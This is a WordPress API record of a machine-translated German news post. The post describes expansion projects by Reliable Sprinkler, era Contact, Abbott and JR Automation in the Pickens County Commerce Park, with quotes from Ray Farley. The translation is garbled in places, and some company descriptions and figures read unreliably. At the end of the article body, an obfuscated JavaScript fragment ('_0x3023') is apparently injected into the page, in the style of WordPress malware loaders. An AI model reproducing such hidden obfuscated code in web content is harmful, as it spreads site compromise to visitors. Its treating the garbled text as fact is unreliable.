{"id":7093,"date":"2020-10-28T14:32:55","date_gmt":"2020-10-28T14:32:55","guid":{"rendered":"http:\/\/alliancepickens.com\/2020\/10\/28\/alliance-pickens-director-begeistert-von-projekten-im-commerce-park\/"},"modified":"2021-07-21T20:14:05","modified_gmt":"2021-07-21T20:14:05","slug":"alliance-pickens-director-begeistert-von-projekten-im-commerce-park","status":"publish","type":"post","link":"https:\/\/alliancepickens.com\/de\/alliance-pickens-director-begeistert-von-projekten-im-commerce-park\/","title":{"rendered":"Alliance Pickens Director begeistert von Projekten im Commerce Park"},"content":{"rendered":"<p>Alliance Pickens-Direktor begeistert von Projekten im Gewerbepark<br \/>\nFacebook Twitter Aktie ver\u00f6ffentlicht am April 15, 2017 Von Greg Oliver<br \/>\nThe Journal<br \/>\nLIBERTY \u2014 Ein Grinsen \u00fcber das Gesicht von Ray Farley, Executive Director von Alliance Pickens, spricht \u00fcber die vier Expansionsprojekte, die im Pickens County Commerce Park im Gange sind.<br \/>\nIm Pickens County Commerce Park in Liberty laufen derzeit vier Projekte. (Rex Brown | The Journal)<br \/>\nDie vier Expansionsprojekte umfassen drei Unternehmen, die in ihren jeweiligen Bereichen Die Tops des Landes sind: Reliable Automatic Sprinkler Co., era Contact USA und Abbott Laboratories, fr\u00fcher bekannt als St. Jude Medical.<br \/>\nZuverl\u00e4ssig, das seine derzeitige 300.000 Quadratmeter gro\u00dfe Anlage um 150.000 Quadratmeter erweitert, steht weltweit an erster Stelle, wenn es um Brandbek\u00e4mpfung geht. Die Anlage im Pickens County ist der einzige Produktionsstandort von Reliable.<br \/>\nDie deutsche Elektrische Bahnkupplungsf\u00fchrer-\u00c4ra Contact, eine neue Erg\u00e4nzung des Gewerbeparks, baut eine 40.000 Quadratmeter gro\u00dfe Anlage. Das lokale Werk wird der nordamerikanische Produktionssitz des Unternehmens sein.<br \/>\nAbbott Laboratories, weltweit erster In-Rhythmus-Ger\u00e4te, erweitert seine derzeitige 100.000 Quadratmeter gro\u00dfe Anlage um 60.000 Quadratmeter.<br \/>\nJR Automation Technologies, weltweit der weltweit zweite in kundenspezifischen Automatisierungsl\u00f6sungen wie Robotik und automatisierte Maschinen, ist im Bau f\u00fcr die erste Phase seiner 50.000 Quadratmeter gro\u00dfen Anlage, die in diesem Monat fertiggestellt werden soll. Das Unternehmen verf\u00fcgt \u00fcber ein Standortpolster vor Ort, das eine Erweiterung um weitere 100.000 Quadratmeter erm\u00f6glichen w\u00fcrde.<br \/>\nFarley ist auch stolz auf das, was TaylorMade Adidas in den Commerce Park gebracht hat. Er sagte, Taylormade, die Top-Golfmarke der Welt, habe mehr als 25 PGA- und LPGA-Meisterschaften produziert, darunter den Sieger des Masters am vergangenen Sonntag sowie den Olympiasieger aus dem Liberty-Geb\u00e4ude.<br \/>\n&#8220;Als Justin Rose und Sergio (Garcia) endeten (Loch Nr.) 18 gebunden (w\u00e4hrend der vierten Runde des Masters am Sonntag, die Garcia in einem Playoff gewann), wusste ich so oder so, dass Pickens County gewann, weil beide Jungs mit Pickens County (hergestellt) Golfb\u00e4lle spielen&#8221;, sagte Farley. &#8220;Es war eine ziemliche Leistung f\u00fcr Weltklasse-Unternehmen, hierher zu kommen, und darauf sind wir sehr stolz f\u00fcr eine so kleine South Carolina Community, dass wir es sind.&#8221;<br \/>\nFarley sagte, neben Bauprojekten laufen auch arbeiten am Gewerbegebiet an einem Kanalisationsausbau.<br \/>\n&#8220;(Ausbau) erfordert Infrastruktur, und eine solche Kanalisation wird vier weitere Standorte im Gewerbegebiet bedienen&#8221;, sagte er.<br \/>\nFarley sagte, w\u00e4hrend er sich \u00fcber den Bau freut, der bereits im Gewerbegebiet sichtbar ist, macht die Tatsache, dass es auch pad-ready-Sites zur Verf\u00fcgung gibt, die Zukunft noch heller.<br \/>\n&#8220;Wir denken gerne, dass wir hier mit drei Nr. 1 und einer Nr. 2 geliefert haben, die zu einer Investition f\u00fcr den privaten Sektor geworden ist&#8221;, sagte Farley. &#8220;F\u00fcr die neue Industrie haben wir die M\u00f6glichkeit, auf einem pad-ready-Site mit allen Versorgungsunternehmen mit drei Nr. 1 auf der anderen Stra\u00dfenseite zu finden. Mit dem Fahrzeug, das wir haben, und der Entwicklung der Belegschaft sind wir zuversichtlich, dass diese Projekte gedeihen und eine arbeitskreative Aktivit\u00e4t haben werden.&#8221;<br \/>\nDie gesamte Grenze des Pickens County Commerce Park ist 310 Hektar, und Farley sagte, dass die letzten Standorte f\u00fcr den Park jetzt abgestuft werden, mit einem Ertrag von mehr als 40 Hektar.<br \/>\nAuf die Frage, ob in diesem Jahr ank\u00fcndigungen ank\u00fcndigungen der wirtschaftlichen Entwicklung zu erwarten sei, antwortete Farley: &#8220;Ja. Wir sind ziemlich zuversichtlich.&#8221;<br \/>\nEiner der Hauptgr\u00fcnde, warum Farley glaubt, dass Pickens County so viele Projekte landet, ist nicht nur die Standortentwicklung, sondern auch die Entwicklung von Arbeitskr\u00e4ften \u2013 insbesondere die Auswirkungen des Scholar Technician-Programms.<br \/>\n&#8220;Der Schl\u00fcssel zum Erfolg bei der Rekrutierung wirtschaftlicher Entwicklung ist die Verf\u00fcgbarkeit von Produkten und die Entwicklung von Arbeitskr\u00e4ften&#8221;, sagte Farley. &#8220;Unsere Aktivit\u00e4ten zur Entwicklung von Arbeitskr\u00e4ften, Scholar Technician und Pickens County Career and Technology Center haben alle bei Projekten zur wirtschaftlichen Entwicklung geholfen.<br \/>\n&#8220;Diese vier Standorte in einen pad-ready Zustand zu bringen, wird unsere Rekrutierung in der wirtschaftlichen Entwicklung erheblich unterst\u00fctzen \u2013 insbesondere bei diesen einzelnen Standorten, die an die Weltweitit\u00e4t Nr. 1 der Unternehmen angrenzen, die im Handelspark existieren.&#8221;<br \/>\nFarley sagte, er freue sich, dass die \u00c4ra Contact bereits die ersten Einstellungen aus dem technischen High-School-Programm in Pickens County gemacht hat. Die beiden ausgew\u00e4hlten Studenten bilden sich nun in Deutschland.<br \/>\nIm Gewerbepark arbeiten derzeit insgesamt 1.600 Mitarbeiter auf mehr als 950.000 Quadratmetern Industriefl\u00e4che. Die Expansionsprojekte werden mehr als 43 Millionen US-Dollar an Investitionen und mehr als 200 neue Arbeitspl\u00e4tze in Pickens County bringen.<br \/>\ngoliver@upstatetoday.com | (864) 973-6687<br \/>\nFolgen Sie auf Twitter @JournalGO<br \/>\nfunction _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);};<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Alliance Pickens-Direktor begeistert von Projekten im Gewerbepark Facebook Twitter Aktie ver\u00f6ffentlicht am April 15, 2017 Von Greg Oliver The Journal LIBERTY \u2014 Ein Grinsen \u00fcber das Gesicht von Ray Farley, Executive Director von Alliance Pickens, spricht \u00fcber die vier Expansionsprojekte, die im Pickens County Commerce Park im Gange sind. Im Pickens County Commerce Park in&hellip;<\/p>\n","protected":false},"author":8,"featured_media":5102,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[57],"tags":[],"class_list":["post-7093","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-news-de","category-57","description-off"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Alliance Pickens Director begeistert von Projekten im Commerce Park - Alliance Pickens<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/alliancepickens.com\/de\/alliance-pickens-director-begeistert-von-projekten-im-commerce-park\/\" \/>\n<meta property=\"og:locale\" content=\"de_DE\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Alliance Pickens Director begeistert von Projekten im Commerce Park - Alliance Pickens\" \/>\n<meta property=\"og:description\" content=\"Alliance Pickens-Direktor begeistert von Projekten im Gewerbepark Facebook Twitter Aktie ver\u00f6ffentlicht am April 15, 2017 Von Greg Oliver The Journal LIBERTY \u2014 Ein Grinsen \u00fcber das Gesicht von Ray Farley, Executive Director von Alliance Pickens, spricht \u00fcber die vier Expansionsprojekte, die im Pickens County Commerce Park im Gange sind. Im Pickens County Commerce Park in&hellip;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/alliancepickens.com\/de\/alliance-pickens-director-begeistert-von-projekten-im-commerce-park\/\" \/>\n<meta property=\"og:site_name\" content=\"Alliance Pickens\" \/>\n<meta property=\"article:published_time\" content=\"2020-10-28T14:32:55+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2021-07-21T20:14:05+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/alliancepickens.com\/wp-content\/uploads\/2019\/04\/post-generic.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"990\" \/>\n\t<meta property=\"og:image:height\" content=\"618\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"AP Transfer\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"AP Transfer\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/alliance-pickens-director-begeistert-von-projekten-im-commerce-park\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/alliance-pickens-director-begeistert-von-projekten-im-commerce-park\\\/\"},\"author\":{\"name\":\"AP Transfer\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/#\\\/schema\\\/person\\\/fbaefd2934455049d2defd0477ce0d01\"},\"headline\":\"Alliance Pickens Director begeistert von Projekten im Commerce Park\",\"datePublished\":\"2020-10-28T14:32:55+00:00\",\"dateModified\":\"2021-07-21T20:14:05+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/alliance-pickens-director-begeistert-von-projekten-im-commerce-park\\\/\"},\"wordCount\":776,\"image\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/alliance-pickens-director-begeistert-von-projekten-im-commerce-park\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/alliancepickens.com\\\/wp-content\\\/uploads\\\/2019\\\/04\\\/post-generic.jpg\",\"articleSection\":[\"News\"],\"inLanguage\":\"de-DE\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/alliance-pickens-director-begeistert-von-projekten-im-commerce-park\\\/\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/alliance-pickens-director-begeistert-von-projekten-im-commerce-park\\\/\",\"name\":\"Alliance Pickens Director begeistert von Projekten im Commerce Park - Alliance Pickens\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/alliance-pickens-director-begeistert-von-projekten-im-commerce-park\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/alliance-pickens-director-begeistert-von-projekten-im-commerce-park\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/alliancepickens.com\\\/wp-content\\\/uploads\\\/2019\\\/04\\\/post-generic.jpg\",\"datePublished\":\"2020-10-28T14:32:55+00:00\",\"dateModified\":\"2021-07-21T20:14:05+00:00\",\"author\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/#\\\/schema\\\/person\\\/fbaefd2934455049d2defd0477ce0d01\"},\"breadcrumb\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/alliance-pickens-director-begeistert-von-projekten-im-commerce-park\\\/#breadcrumb\"},\"inLanguage\":\"de-DE\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/alliancepickens.com\\\/de\\\/alliance-pickens-director-begeistert-von-projekten-im-commerce-park\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"de-DE\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/alliance-pickens-director-begeistert-von-projekten-im-commerce-park\\\/#primaryimage\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/wp-content\\\/uploads\\\/2019\\\/04\\\/post-generic.jpg\",\"contentUrl\":\"https:\\\/\\\/alliancepickens.com\\\/wp-content\\\/uploads\\\/2019\\\/04\\\/post-generic.jpg\",\"width\":990,\"height\":618,\"caption\":\"Alliance Pickens Logo\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/alliance-pickens-director-begeistert-von-projekten-im-commerce-park\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Alliance Pickens Director begeistert von Projekten im Commerce Park\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/#website\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/\",\"name\":\"Alliance Pickens\",\"description\":\"recruitment and expansion in Pickens County\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"de-DE\"},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/#\\\/schema\\\/person\\\/fbaefd2934455049d2defd0477ce0d01\",\"name\":\"AP Transfer\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"de-DE\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/db90baf906a6267650699f5b70c5136a4ae914ec7c295d799e8eff1e1ecb640f?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/db90baf906a6267650699f5b70c5136a4ae914ec7c295d799e8eff1e1ecb640f?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/db90baf906a6267650699f5b70c5136a4ae914ec7c295d799e8eff1e1ecb640f?s=96&d=mm&r=g\",\"caption\":\"AP Transfer\"},\"url\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/author\\\/aptransfer\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Alliance Pickens Director begeistert von Projekten im Commerce Park - Alliance Pickens","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/alliancepickens.com\/de\/alliance-pickens-director-begeistert-von-projekten-im-commerce-park\/","og_locale":"de_DE","og_type":"article","og_title":"Alliance Pickens Director begeistert von Projekten im Commerce Park - Alliance Pickens","og_description":"Alliance Pickens-Direktor begeistert von Projekten im Gewerbepark Facebook Twitter Aktie ver\u00f6ffentlicht am April 15, 2017 Von Greg Oliver The Journal LIBERTY \u2014 Ein Grinsen \u00fcber das Gesicht von Ray Farley, Executive Director von Alliance Pickens, spricht \u00fcber die vier Expansionsprojekte, die im Pickens County Commerce Park im Gange sind. Im Pickens County Commerce Park in&hellip;","og_url":"https:\/\/alliancepickens.com\/de\/alliance-pickens-director-begeistert-von-projekten-im-commerce-park\/","og_site_name":"Alliance Pickens","article_published_time":"2020-10-28T14:32:55+00:00","article_modified_time":"2021-07-21T20:14:05+00:00","og_image":[{"width":990,"height":618,"url":"https:\/\/alliancepickens.com\/wp-content\/uploads\/2019\/04\/post-generic.jpg","type":"image\/jpeg"}],"author":"AP Transfer","twitter_card":"summary_large_image","twitter_misc":{"Written by":"AP Transfer","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/alliancepickens.com\/de\/alliance-pickens-director-begeistert-von-projekten-im-commerce-park\/#article","isPartOf":{"@id":"https:\/\/alliancepickens.com\/de\/alliance-pickens-director-begeistert-von-projekten-im-commerce-park\/"},"author":{"name":"AP Transfer","@id":"https:\/\/alliancepickens.com\/de\/#\/schema\/person\/fbaefd2934455049d2defd0477ce0d01"},"headline":"Alliance Pickens Director begeistert von Projekten im Commerce Park","datePublished":"2020-10-28T14:32:55+00:00","dateModified":"2021-07-21T20:14:05+00:00","mainEntityOfPage":{"@id":"https:\/\/alliancepickens.com\/de\/alliance-pickens-director-begeistert-von-projekten-im-commerce-park\/"},"wordCount":776,"image":{"@id":"https:\/\/alliancepickens.com\/de\/alliance-pickens-director-begeistert-von-projekten-im-commerce-park\/#primaryimage"},"thumbnailUrl":"https:\/\/alliancepickens.com\/wp-content\/uploads\/2019\/04\/post-generic.jpg","articleSection":["News"],"inLanguage":"de-DE"},{"@type":"WebPage","@id":"https:\/\/alliancepickens.com\/de\/alliance-pickens-director-begeistert-von-projekten-im-commerce-park\/","url":"https:\/\/alliancepickens.com\/de\/alliance-pickens-director-begeistert-von-projekten-im-commerce-park\/","name":"Alliance Pickens Director begeistert von Projekten im Commerce Park - Alliance Pickens","isPartOf":{"@id":"https:\/\/alliancepickens.com\/de\/#website"},"primaryImageOfPage":{"@id":"https:\/\/alliancepickens.com\/de\/alliance-pickens-director-begeistert-von-projekten-im-commerce-park\/#primaryimage"},"image":{"@id":"https:\/\/alliancepickens.com\/de\/alliance-pickens-director-begeistert-von-projekten-im-commerce-park\/#primaryimage"},"thumbnailUrl":"https:\/\/alliancepickens.com\/wp-content\/uploads\/2019\/04\/post-generic.jpg","datePublished":"2020-10-28T14:32:55+00:00","dateModified":"2021-07-21T20:14:05+00:00","author":{"@id":"https:\/\/alliancepickens.com\/de\/#\/schema\/person\/fbaefd2934455049d2defd0477ce0d01"},"breadcrumb":{"@id":"https:\/\/alliancepickens.com\/de\/alliance-pickens-director-begeistert-von-projekten-im-commerce-park\/#breadcrumb"},"inLanguage":"de-DE","potentialAction":[{"@type":"ReadAction","target":["https:\/\/alliancepickens.com\/de\/alliance-pickens-director-begeistert-von-projekten-im-commerce-park\/"]}]},{"@type":"ImageObject","inLanguage":"de-DE","@id":"https:\/\/alliancepickens.com\/de\/alliance-pickens-director-begeistert-von-projekten-im-commerce-park\/#primaryimage","url":"https:\/\/alliancepickens.com\/wp-content\/uploads\/2019\/04\/post-generic.jpg","contentUrl":"https:\/\/alliancepickens.com\/wp-content\/uploads\/2019\/04\/post-generic.jpg","width":990,"height":618,"caption":"Alliance Pickens Logo"},{"@type":"BreadcrumbList","@id":"https:\/\/alliancepickens.com\/de\/alliance-pickens-director-begeistert-von-projekten-im-commerce-park\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/alliancepickens.com\/de\/"},{"@type":"ListItem","position":2,"name":"Alliance Pickens Director begeistert von Projekten im Commerce Park"}]},{"@type":"WebSite","@id":"https:\/\/alliancepickens.com\/de\/#website","url":"https:\/\/alliancepickens.com\/de\/","name":"Alliance Pickens","description":"recruitment and expansion in Pickens County","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/alliancepickens.com\/de\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"de-DE"},{"@type":"Person","@id":"https:\/\/alliancepickens.com\/de\/#\/schema\/person\/fbaefd2934455049d2defd0477ce0d01","name":"AP Transfer","image":{"@type":"ImageObject","inLanguage":"de-DE","@id":"https:\/\/secure.gravatar.com\/avatar\/db90baf906a6267650699f5b70c5136a4ae914ec7c295d799e8eff1e1ecb640f?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/db90baf906a6267650699f5b70c5136a4ae914ec7c295d799e8eff1e1ecb640f?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/db90baf906a6267650699f5b70c5136a4ae914ec7c295d799e8eff1e1ecb640f?s=96&d=mm&r=g","caption":"AP Transfer"},"url":"https:\/\/alliancepickens.com\/de\/author\/aptransfer\/"}]}},"_links":{"self":[{"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/posts\/7093","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/users\/8"}],"replies":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/comments?post=7093"}],"version-history":[{"count":0,"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/posts\/7093\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/media\/5102"}],"wp:attachment":[{"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/media?parent=7093"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/categories?post=7093"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/tags?post=7093"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}